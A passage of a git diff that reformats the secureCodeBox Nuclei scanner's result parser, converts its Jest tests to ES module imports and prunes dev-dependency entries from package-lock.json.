finding.info.reference.flatMap(url => ({ - type: "URL", - value: url - })) : []; + // Add reference URLs to the references array + const urlReferences = finding.info.reference + ? finding.info.reference.flatMap((url) => ({ + type: "URL", + value: url, + })) + : []; // Add CWE reference to the references array const cweIds = finding?.info?.classification?.["cwe-id"] ?? []; - const cweReferences = cweIds.flatMap(cweId => [ + const cweReferences = cweIds.flatMap((cweId) => [ { type: "CWE", - value: cweId.toUpperCase() + value: cweId.toUpperCase(), }, { type: "URL", - value: `https://cwe.mitre.org/data/definitions/${cweId}.html` - } + value: `https://cwe.mitre.org/data/definitions/${cweId}.html`, + }, ]); - + // Add CVE reference to the references array const cveIds = finding?.info?.classification?.["cve-id"] ?? []; - const cveReferences = cveIds.flatMap(cveId => [ + const cveReferences = cveIds.flatMap((cveId) => [ { type: "CVE", - value: cveId.toUpperCase() + value: cveId.toUpperCase(), }, { type: "URL", - value: `https://nvd.nist.gov/vuln/detail/${cveId}` - } + value: `https://nvd.nist.gov/vuln/detail/${cveId}`, + }, ]); - - - + const references = [...urlReferences, ...cweReferences, ...cveReferences]; - const timestamp = finding.timestamp ? new Date(finding.timestamp).toISOString() : null; + const timestamp = finding.timestamp + ? new Date(finding.timestamp).toISOString() + : null; return { name: finding.info.name, @@ -59,7 +61,7 @@ async function parse(fileContent) { location: finding.host, severity: getAdjustedSeverity(finding?.info?.severity.toUpperCase()), category: finding["template-id"], - references: references.length > 0 ? references : null, + references: references.length > 0 ? references : null, attributes: { ip_addresses: finding.ip ? [finding.ip] : [], type: finding.type || null, @@ -131,5 +133,3 @@ function readJsonLines(jsonl) { return []; } } - -module.exports.parse = parse; diff --git a/scanners/nuclei/parser/parser.test.js b/scanners/nuclei/parser/parser.test.js index 0360910106..05d3fd0b5e 100644 --- a/scanners/nuclei/parser/parser.test.js +++ b/scanners/nuclei/parser/parser.test.js @@ -2,21 +2,18 @@ // // SPDX-License-Identifier: Apache-2.0 -const { readFile } = require("fs/promises"); -const { - validateParser, -} = require("@securecodebox/parser-sdk-nodejs/parser-utils"); +import { readFile } from "fs/promises"; +import { validateParser } from "@securecodebox/parser-sdk-nodejs/parser-utils"; -const { parse } = require("./parser"); +import { parse } from "./parser"; test("parses empty result correctly", async () => { - const fileContent = - await readFile( - __dirname + "/__testFiles__/empty-test.jsonl", - { - encoding: "utf8", - } - ) + const fileContent = await readFile( + import.meta.dirname + "/__testFiles__/empty-test.jsonl", + { + encoding: "utf8", + }, + ); const findings = await parse(fileContent); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -24,27 +21,12 @@ test("parses empty result correctly", async () => { }); test("parses the example.com result correctly", async () => { - const fileContent = - await readFile( - __dirname + "/__testFiles__/example-com-test.jsonl", - { - encoding: "utf8", - } - ) - - const findings = await parse(fileContent); - await expect(validateParser(findings)).resolves.toBeUndefined(); - expect(findings).toMatchSnapshot(); -}); - -test.skip("parses ftp result correctly", async () => { - const fileContent = - await readFile( - __dirname + "/__testFiles__/ftp-test.jsonl", - { - encoding: "utf8", - } - ) + const fileContent = await readFile( + import.meta.dirname + "/__testFiles__/example-com-test.jsonl", + { + encoding: "utf8", + }, + ); const findings = await parse(fileContent); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -52,13 +34,12 @@ test.skip("parses ftp result correctly", async () => { }); test("parses secureCodeBox.io result correctly", async () => { - const fileContent = - await readFile( - __dirname + "/__testFiles__/secureCodeBox-test.jsonl", - { - encoding: "utf8", - } - ) + const fileContent = await readFile( + import.meta.dirname + "/__testFiles__/secureCodeBox-test.jsonl", + { + encoding: "utf8", + }, + ); const findings = await parse(fileContent); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -66,13 +47,12 @@ test("parses secureCodeBox.io result correctly", async () => { }); test("parses log4shell result correctly", async () => { - const fileContent = - await readFile( - __dirname + "/__testFiles__/log4shell.jsonl", - { - encoding: "utf8", - } - ) + const fileContent = await readFile( + import.meta.dirname + "/__testFiles__/log4shell.jsonl", + { + encoding: "utf8", + }, + ); const findings = await parse(JSON.parse(fileContent)); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -80,13 +60,13 @@ test("parses log4shell result correctly", async () => { }); test("parses results with requests & responses correctly", async () => { - const fileContent = - await readFile( - __dirname + "/__testFiles__/example-com-only-misc-tags-with-incluce-rr.jsonl", - { - encoding: "utf8", - } - ) + const fileContent = await readFile( + import.meta.dirname + + "/__testFiles__/example-com-only-misc-tags-with-incluce-rr.jsonl", + { + encoding: "utf8", + }, + ); const findings = await parse(JSON.parse(fileContent)); await expect(validateParser(findings)).resolves.toBeUndefined(); diff --git a/scanners/package-lock.json b/scanners/package-lock.json index a1b15fd8af..9d737f8e0b 100644 --- a/scanners/package-lock.json +++ b/scanners/package-lock.json @@ -9,12 +9,7 @@ "version": "1.0.0", "license": "Apache-2.0", "devDependencies": { - "@kubernetes/client-node": "^0.19.0", - "@securecodebox/parser-sdk-nodejs": "file:../parser-sdk/nodejs", - "@types/jest": "^29.5.14", - "jest": "^29.7.0", - "prettier": "^3.4.2", - "ts-jest": "^29.2.5" + "@securecodebox/parser-sdk-nodejs": "file:../parser-sdk/nodejs" } }, "../parser-sdk/nodejs": { @@ -23,7558 +18,28 @@ "dev": true, "license": "Apache-2.0", "dependencies": { - "@kubernetes/client-node": "^0.22.3", + "@kubernetes/client-node": "^1.3.0", "ajv": "^8.17.1", "ajv-draft-04": "^1.0.0", "ajv-formats": "^3.0.1", - "axios": "^1.7.8", - "jsonpointer": "^5.0.1", - "ws": "^8.13.0" - } - }, - "node_modules/@ampproject/remapping": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/@ampproject/remapping/-/remapping-2.2.0.tgz", - "integrity": "sha512-qRmjj8nj9qmLTQXXmaR1cck3UXSRMPrbsLJAasZpF+t3riI71BXed5ebIOYwQntykeZuhjsdweEc9BxH5Jc26w==", - "dev": true, - "dependencies": { - "@jridgewell/gen-mapping": "^0.1.0", - "@jridgewell/trace-mapping": "^0.3.9" - }, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@babel/code-frame": { - "version": "7.26.2", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.26.2.tgz", - "integrity": "sha512-RJlIHRueQgwWitWgF8OdFYGZX328Ax5BCemNGlqHfplnRT9ESi8JkFlvaVYbS+UubVY6dpv87Fs2u5M29iNFVQ==", - "dev": true, - "dependencies": { - "@babel/helper-validator-identifier": "^7.25.9", - "js-tokens": "^4.0.0", - "picocolors": "^1.0.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/compat-data": { - "version": "7.26.2", - "resolved": "https://registry.npmjs.org/@babel/compat-data/-/compat-data-7.26.2.tgz", - "integrity": "sha512-Z0WgzSEa+aUcdiJuCIqgujCshpMWgUpgOxXotrYPSA53hA3qopNaqcJpyr0hVb1FeWdnqFA35/fUtXgBK8srQg==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/core": { - "version": "7.26.0", - "resolved": "https://registry.npmjs.org/@babel/core/-/core-7.26.0.tgz", - "integrity": "sha512-i1SLeK+DzNnQ3LL/CswPCa/E5u4lh1k6IAEphON8F+cXt0t9euTshDru0q7/IqMa1PMPz5RnHuHscF8/ZJsStg==", - "dev": true, - "dependencies": { - "@ampproject/remapping": "^2.2.0", - "@babel/code-frame": "^7.26.0", - "@babel/generator": "^7.26.0", - "@babel/helper-compilation-targets": "^7.25.9", - "@babel/helper-module-transforms": "^7.26.0", - "@babel/helpers": "^7.26.0", - "@babel/parser": "^7.26.0", - "@babel/template": "^7.25.9", - "@babel/traverse": "^7.25.9", - "@babel/types": "^7.26.0", - "convert-source-map": "^2.0.0", - "debug": "^4.1.0", - "gensync": "^1.0.0-beta.2", - "json5": "^2.2.3", - "semver": "^6.3.1" - }, - "engines": { - "node": ">=6.9.0" - }, - "funding": { - "type": "opencollective", - "url": "https://opencollective.com/babel" - } - }, - "node_modules/@babel/generator": { - "version": "7.26.2", - "resolved": "https://registry.npmjs.org/@babel/generator/-/generator-7.26.2.tgz", - "integrity": "sha512-zevQbhbau95nkoxSq3f/DC/SC+EEOUZd3DYqfSkMhY2/wfSeaHV1Ew4vk8e+x8lja31IbyuUa2uQ3JONqKbysw==", - "dev": true, - "dependencies": { - "@babel/parser": "^7.26.2", - "@babel/types": "^7.26.0", - "@jridgewell/gen-mapping": "^0.3.5", - "@jridgewell/trace-mapping": "^0.3.25", - "jsesc": "^3.0.2" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/generator/node_modules/@jridgewell/gen-mapping": { - "version": "0.3.5", - "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.5.tgz", - "integrity": "sha512-IzL8ZoEDIBRWEzlCcRhOaCupYyN5gdIK+Q6fbFdPDg6HqX6jpkItn7DFIpW9LQzXG6Df9sA7+OKnq0qlz/GaQg==", - "dev": true, - "dependencies": { - "@jridgewell/set-array": "^1.2.1", - "@jridgewell/sourcemap-codec": "^1.4.10", - "@jridgewell/trace-mapping": "^0.3.24" - }, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@babel/helper-compilation-targets": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-compilation-targets/-/helper-compilation-targets-7.25.9.tgz", - "integrity": "sha512-j9Db8Suy6yV/VHa4qzrj9yZfZxhLWQdVnRlXxmKLYlhWUVB1sB2G5sxuWYXk/whHD9iW76PmNzxZ4UCnTQTVEQ==", - "dev": true, - "dependencies": { - "@babel/compat-data": "^7.25.9", - "@babel/helper-validator-option": "^7.25.9", - "browserslist": "^4.24.0", - "lru-cache": "^5.1.1", - "semver": "^6.3.1" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-compilation-targets/node_modules/lru-cache": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-5.1.1.tgz", - "integrity": "sha512-KpNARQA3Iwv+jTA0utUVVbrh+Jlrr1Fv0e56GGzAFOXN7dk/FviaDW8LHmK52DlcH4WP2n6gI8vN1aesBFgo9w==", - "dev": true, - "dependencies": { - "yallist": "^3.0.2" - } - }, - "node_modules/@babel/helper-compilation-targets/node_modules/yallist": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.1.1.tgz", - "integrity": "sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==", - "dev": true - }, - "node_modules/@babel/helper-module-imports": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-module-imports/-/helper-module-imports-7.25.9.tgz", - "integrity": "sha512-tnUA4RsrmflIM6W6RFTLFSXITtl0wKjgpnLgXyowocVPrbYrLUXSBXDgTs8BlbmIzIdlBySRQjINYs2BAkiLtw==", - "dev": true, - "dependencies": { - "@babel/traverse": "^7.25.9", - "@babel/types": "^7.25.9" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-module-transforms": { - "version": "7.26.0", - "resolved": "https://registry.npmjs.org/@babel/helper-module-transforms/-/helper-module-transforms-7.26.0.tgz", - "integrity": "sha512-xO+xu6B5K2czEnQye6BHA7DolFFmS3LB7stHZFaOLb1pAwO1HWLS8fXA+eh0A2yIvltPVmx3eNNDBJA2SLHXFw==", - "dev": true, - "dependencies": { - "@babel/helper-module-imports": "^7.25.9", - "@babel/helper-validator-identifier": "^7.25.9", - "@babel/traverse": "^7.25.9" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" - } - }, - "node_modules/@babel/helper-plugin-utils": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-plugin-utils/-/helper-plugin-utils-7.25.9.tgz", - "integrity": "sha512-kSMlyUVdWe25rEsRGviIgOWnoT/nfABVWlqt9N19/dIPWViAOW2s9wznP5tURbs/IDuNk4gPy3YdYRgH3uxhBw==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-string-parser": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-string-parser/-/helper-string-parser-7.25.9.tgz", - "integrity": "sha512-4A/SCr/2KLd5jrtOMFzaKjVtAei3+2r/NChoBNoZ3EyP/+GlhoaEGoWOZUmFmoITP7zOJyHIMm+DYRd8o3PvHA==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-validator-identifier": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.25.9.tgz", - "integrity": "sha512-Ed61U6XJc3CVRfkERJWDz4dJwKe7iLmmJsbOGu9wSloNSFttHV0I8g6UAgb7qnK5ly5bGLPd4oXZlxCdANBOWQ==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-validator-option": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-option/-/helper-validator-option-7.25.9.tgz", - "integrity": "sha512-e/zv1co8pp55dNdEcCynfj9X7nyUKUXoUEwfXqaZt0omVOmDe9oOTdKStH4GmAw6zxMFs50ZayuMfHDKlO7Tfw==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helpers": { - "version": "7.26.0", - "resolved": "https://registry.npmjs.org/@babel/helpers/-/helpers-7.26.0.tgz", - "integrity": "sha512-tbhNuIxNcVb21pInl3ZSjksLCvgdZy9KwJ8brv993QtIVKJBBkYXz4q4ZbAv31GdnC+R90np23L5FbEBlthAEw==", - "dev": true, - "dependencies": { - "@babel/template": "^7.25.9", - "@babel/types": "^7.26.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/parser": { - "version": "7.26.2", - "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.26.2.tgz", - "integrity": "sha512-DWMCZH9WA4Maitz2q21SRKHo9QXZxkDsbNZoVD62gusNtNBBqDg9i7uOhASfTfIGNzW+O+r7+jAlM8dwphcJKQ==", - "dev": true, - "dependencies": { - "@babel/types": "^7.26.0" - }, - "bin": { - "parser": "bin/babel-parser.js" - }, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@babel/plugin-syntax-async-generators": { - "version": "7.8.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-async-generators/-/plugin-syntax-async-generators-7.8.4.tgz", - "integrity": "sha512-tycmZxkGfZaxhMRbXlPXuVFpdWlXpir2W4AMhSJgRKzk/eDlIXOhb2LHWoLpDF7TEHylV5zNhykX6KAgHJmTNw==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-bigint": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-bigint/-/plugin-syntax-bigint-7.8.3.tgz", - "integrity": "sha512-wnTnFlG+YxQm3vDxpGE57Pj0srRU4sHE/mDkt1qv2YJJSeUAec2ma4WLUnUPeKjyrfntVwe/N6dCXpU+zL3Npg==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-class-properties": { - "version": "7.12.13", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-class-properties/-/plugin-syntax-class-properties-7.12.13.tgz", - "integrity": "sha512-fm4idjKla0YahUNgFNLCB0qySdsoPiZP3iQE3rky0mBUtMZ23yDJ9SJdg6dXTSDnulOVqiF3Hgr9nbXvXTQZYA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.12.13" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-import-meta": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-meta/-/plugin-syntax-import-meta-7.10.4.tgz", - "integrity": "sha512-Yqfm+XDx0+Prh3VSeEQCPU81yC+JWZ2pDPFSS4ZdpfZhp4MkFMaDC1UqseovEKwSUpnIL7+vK+Clp7bfh0iD7g==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-json-strings": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-json-strings/-/plugin-syntax-json-strings-7.8.3.tgz", - "integrity": "sha512-lY6kdGpWHvjoe2vk4WrAapEuBR69EMxZl+RoGRhrFGNYVK8mOPAW8VfbT/ZgrFbXlDNiiaxQnAtgVCZ6jv30EA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-jsx": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-jsx/-/plugin-syntax-jsx-7.25.9.tgz", - "integrity": "sha512-ld6oezHQMZsZfp6pWtbjaNDF2tiiCYYDqQszHt5VV437lewP9aSi2Of99CK0D0XB21k7FLgnLcmQKyKzynfeAA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.25.9" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-logical-assignment-operators": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-logical-assignment-operators/-/plugin-syntax-logical-assignment-operators-7.10.4.tgz", - "integrity": "sha512-d8waShlpFDinQ5MtvGU9xDAOzKH47+FFoney2baFIoMr952hKOLp1HR7VszoZvOsV/4+RRszNY7D17ba0te0ig==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-nullish-coalescing-operator": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-nullish-coalescing-operator/-/plugin-syntax-nullish-coalescing-operator-7.8.3.tgz", - "integrity": "sha512-aSff4zPII1u2QD7y+F8oDsz19ew4IGEJg9SVW+bqwpwtfFleiQDMdzA/R+UlWDzfnHFCxxleFT0PMIrR36XLNQ==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-numeric-separator": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-numeric-separator/-/plugin-syntax-numeric-separator-7.10.4.tgz", - "integrity": "sha512-9H6YdfkcK/uOnY/K7/aA2xpzaAgkQn37yzWUMRK7OaPOqOpGS1+n0H5hxT9AUw9EsSjPW8SVyMJwYRtWs3X3ug==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-object-rest-spread": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-object-rest-spread/-/plugin-syntax-object-rest-spread-7.8.3.tgz", - "integrity": "sha512-XoqMijGZb9y3y2XskN+P1wUGiVwWZ5JmoDRwx5+3GmEplNyVM2s2Dg8ILFQm8rWM48orGy5YpI5Bl8U1y7ydlA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-optional-catch-binding": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-catch-binding/-/plugin-syntax-optional-catch-binding-7.8.3.tgz", - "integrity": "sha512-6VPD0Pc1lpTqw0aKoeRTMiB+kWhAoT24PA+ksWSBrFtl5SIRVpZlwN3NNPQjehA2E/91FV3RjLWoVTglWcSV3Q==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-optional-chaining": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-chaining/-/plugin-syntax-optional-chaining-7.8.3.tgz", - "integrity": "sha512-KoK9ErH1MBlCPxV0VANkXW2/dw4vlbGDrFgz8bmUsBGYkFRcbRwMh6cIJubdPrkxRwuGdtCk0v/wPTKbQgBjkg==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-top-level-await": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-top-level-await/-/plugin-syntax-top-level-await-7.14.5.tgz", - "integrity": "sha512-hx++upLv5U1rgYfwe1xBQUhRmU41NEvpUvrp8jkrSCdvGSnM5/qdRMtylJ6PG5OFkBaHkbTAKTnd3/YyESRHFw==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.14.5" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-typescript": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-typescript/-/plugin-syntax-typescript-7.25.9.tgz", - "integrity": "sha512-hjMgRy5hb8uJJjUcdWunWVcoi9bGpJp8p5Ol1229PoN6aytsLwNMgmdftO23wnCLMfVmTwZDWMPNq/D1SY60JQ==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.25.9" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/template": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.25.9.tgz", - "integrity": "sha512-9DGttpmPvIxBb/2uwpVo3dqJ+O6RooAFOS+lB+xDqoE2PVCE8nfoHMdZLpfCQRLwvohzXISPZcgxt80xLfsuwg==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.25.9", - "@babel/parser": "^7.25.9", - "@babel/types": "^7.25.9" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/traverse": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/traverse/-/traverse-7.25.9.tgz", - "integrity": "sha512-ZCuvfwOwlz/bawvAuvcj8rrithP2/N55Tzz342AkTvq4qaWbGfmCk/tKhNaV2cthijKrPAA8SRJV5WWe7IBMJw==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.25.9", - "@babel/generator": "^7.25.9", - "@babel/parser": "^7.25.9", - "@babel/template": "^7.25.9", - "@babel/types": "^7.25.9", - "debug": "^4.3.1", - "globals": "^11.1.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/types": { - "version": "7.26.0", - "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.26.0.tgz", - "integrity": "sha512-Z/yiTPj+lDVnF7lWeKCIJzaIkI0vYO87dMpZ4bg4TDrFe4XXLFWL1TbXU27gBP3QccxV9mZICCrnjnYlJjXHOA==", - "dev": true, - "dependencies": { - "@babel/helper-string-parser": "^7.25.9", - "@babel/helper-validator-identifier": "^7.25.9" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@bcoe/v8-coverage": { - "version": "0.2.3", - "resolved": "https://registry.npmjs.org/@bcoe/v8-coverage/-/v8-coverage-0.2.3.tgz", - "integrity": "sha512-0hYQ8SB4Db5zvZB4axdMHGwEaQjkZzFjQiN9LVYvIFB2nSUHW9tYpxWriPrWDASIxiaXax83REcLxuSdnGPZtw==", - "dev": true - }, - "node_modules/@istanbuljs/load-nyc-config": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/@istanbuljs/load-nyc-config/-/load-nyc-config-1.1.0.tgz", - "integrity": "sha512-VjeHSlIzpv/NyD3N0YuHfXOPDIixcA1q2ZV98wsMqcYlPmv2n3Yb2lYP9XMElnaFVXg5A7YLTeLu6V84uQDjmQ==", - "dev": true, - "dependencies": { - "camelcase": "^5.3.1", - "find-up": "^4.1.0", - "get-package-type": "^0.1.0", - "js-yaml": "^3.13.1", - "resolve-from": "^5.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/@istanbuljs/schema": { - "version": "0.1.3", - "resolved": "https://registry.npmjs.org/@istanbuljs/schema/-/schema-0.1.3.tgz", - "integrity": "sha512-ZXRY4jNvVgSVQ8DL3LTcakaAtXwTVUxE81hslsyD2AtoXW/wVob10HkOJ1X/pAlcI7D+2YoZKg5do8G/w6RYgA==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/@jest/console": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/console/-/console-29.7.0.tgz", - "integrity": "sha512-5Ni4CU7XHQi32IJ398EEP4RrB8eV09sXP2ROqD4bksHrnTree52PsxvX8tpL8LvTZ3pFzXyPbNQReSN41CAhOg==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/core": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/core/-/core-29.7.0.tgz", - "integrity": "sha512-n7aeXWKMnGtDA48y8TLWJPJmLmmZ642Ceo78cYWEpiD7FzDgmNDV/GCVRorPABdXLJZ/9wzzgZAlHjXjxDHGsg==", - "dev": true, - "dependencies": { - "@jest/console": "^29.7.0", - "@jest/reporters": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "jest-changed-files": "^29.7.0", - "jest-config": "^29.7.0", - "jest-haste-map": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-regex-util": "^29.6.3", - "jest-resolve": "^29.7.0", - "jest-resolve-dependencies": "^29.7.0", - "jest-runner": "^29.7.0", - "jest-runtime": "^29.7.0", - "jest-snapshot": "^29.7.0", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "jest-watcher": "^29.7.0", - "micromatch": "^4.0.4", - "pretty-format": "^29.7.0", - "slash": "^3.0.0", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/@jest/environment": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/environment/-/environment-29.7.0.tgz", - "integrity": "sha512-aQIfHDq33ExsN4jP1NWGXhxgQ/wixs60gDiKO+XVMd8Mn0NWPWgc34ZQDTb2jKaUWQ7MuwoitXAsN2XVXNMpAw==", - "dev": true, - "dependencies": { - "@jest/fake-timers": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "jest-mock": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/expect": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/expect/-/expect-29.7.0.tgz", - "integrity": "sha512-8uMeAMycttpva3P1lBHB8VciS9V0XAr3GymPpipdyQXbBcuhkLQOSe8E/p92RyAdToS6ZD1tFkX+CkhoECE0dQ==", - "dev": true, - "dependencies": { - "expect": "^29.7.0", - "jest-snapshot": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/expect-utils": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-29.7.0.tgz", - "integrity": "sha512-GlsNBWiFQFCVi9QVSx7f5AgMeLxe9YCCs5PuP2O2LdjDAA8Jh9eX7lA1Jq/xdXw3Wb3hyvlFNfZIfcRetSzYcA==", - "dev": true, - "dependencies": { - "jest-get-type": "^29.6.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/fake-timers": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/fake-timers/-/fake-timers-29.7.0.tgz", - "integrity": "sha512-q4DH1Ha4TTFPdxLsqDXK1d3+ioSL7yL5oCMJZgDYm6i+6CygW5E5xVr/D1HdsGxjt1ZWSfUAs9OxSB/BNelWrQ==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "@sinonjs/fake-timers": "^10.0.2", - "@types/node": "*", - "jest-message-util": "^29.7.0", - "jest-mock": "^29.7.0", - "jest-util": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/globals": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/globals/-/globals-29.7.0.tgz", - "integrity": "sha512-mpiz3dutLbkW2MNFubUGUEVLkTGiqW6yLVTA+JbP6fI6J5iL9Y0Nlg8k95pcF8ctKwCS7WVxteBs29hhfAotzQ==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.7.0", - "@jest/expect": "^29.7.0", - "@jest/types": "^29.6.3", - 